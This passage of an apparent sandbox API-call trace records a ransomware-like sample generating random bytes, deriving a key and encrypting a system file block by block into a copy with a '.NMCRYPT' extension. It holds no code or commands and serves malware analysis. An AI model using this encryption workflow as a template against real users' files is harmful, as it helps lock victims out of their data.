dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.254] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.255] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.256] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.256] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.256] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.256] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.256] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.256] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.256] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.257] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0161.257] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.257] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad738) returned 1 [0161.257] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0161.257] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0161.257] wcslen (_String="\\\\?\\") returned 0x4 [0161.257] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad138) returned 1 [0161.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0161.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0161.275] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=6656) returned 1 [0161.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0161.276] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.277] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.277] GetLastError () returned 0x0 [0161.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.296] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.296] GetLastError () returned 0x0 [0161.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.296] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.296] GetLastError () returned 0x0 [0161.296] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.296] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.297] GetLastError () returned 0x0 [0161.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.297] GetLastError () returned 0x0 [0161.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.297] GetLastError () returned 0x0 [0161.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.297] GetLastError () returned 0x0 [0161.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.297] GetLastError () returned 0x0 [0161.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.297] GetLastError () returned 0x0 [0161.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.297] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.297] GetLastError () returned 0x0 [0161.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.297] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.298] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.298] GetLastError () returned 0x0 [0161.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.298] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.298] GetLastError () returned 0x0 [0161.298] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, 